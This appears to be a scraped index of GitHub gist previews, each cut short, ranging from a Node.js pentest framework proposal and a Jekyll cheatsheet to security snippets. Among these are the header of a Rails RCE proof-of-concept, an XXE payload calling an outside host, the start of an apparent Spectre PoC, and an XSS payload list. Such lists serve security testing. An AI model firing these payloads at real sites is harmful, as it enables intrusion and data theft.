jesusprubio

Proposal: Node.js penetration test framework

Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).

Why?

• I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
• There're different projects implementing exactly the same thing, ie: port scanners.
• We're working in a too new environment, so we need to make it together.

postmodern

#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
#   https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#

mathiasbynens

superfish.pem contains:

1. the Superfish certificate as found by both Chris Palmer and Matt Burke;
2. the encrypted private key as found by Karl Koscher.

$ openssl x509 -in superfish.pem -text
Certificate:
    Data:
        Version: 3 (0x2)

SidShetye

# Call this from inside a startup task/batch file as shown in the next two lines (minus the '# ')
# PowerShell -ExecutionPolicy Unrestricted .\HardenSsl.ps1 >> log-HardenSsl.txt 2>&1
# EXIT /B 0

# Credits: 
# http://azure.microsoft.com/blog/2014/10/19/how-to-disable-ssl-3-0-in-azure-websites-roles-and-virtual-machines/
# http://lukieb.blogspot.com/2014/11/tightening-up-your-azure-cloud-service.html

$nl = [Environment]::NewLine
$regkeys = @(

magicznyleszek

Jekyll & Liquid Cheatsheet

A list of the most common functionalities in Jekyll (Liquid). You can use Jekyll with GitHub Pages, just make sure you are using the proper version.

Running

Running a local server for testing purposes:

magnetikonline

IE 7/8/9/10/11 Virtual machines from Microsoft

We have moved: https://github.com/magnetikonline/linuxmicrosoftievirtualmachines

Due to the popularity of this Gist, and the work in keeping it updated via a Gist, all future updates will take place at the above location. Thanks!

paragonie-scott

Hello software developers,

Please check your code to ensure you're not making one of the following mistakes related to cryptography.

I. General Mistakes

• Writing your own home-grown cryptography primitives (For example: Mifare Classic)
  • Exception: For the sake of learning, but don't deploy it in production.
• Using a fast hash function (e.g. MD5, SHA256) for storing passwords. Use bcrypt instead.
• Not using a cryptographically secure random number generator

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

ErikAugust

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>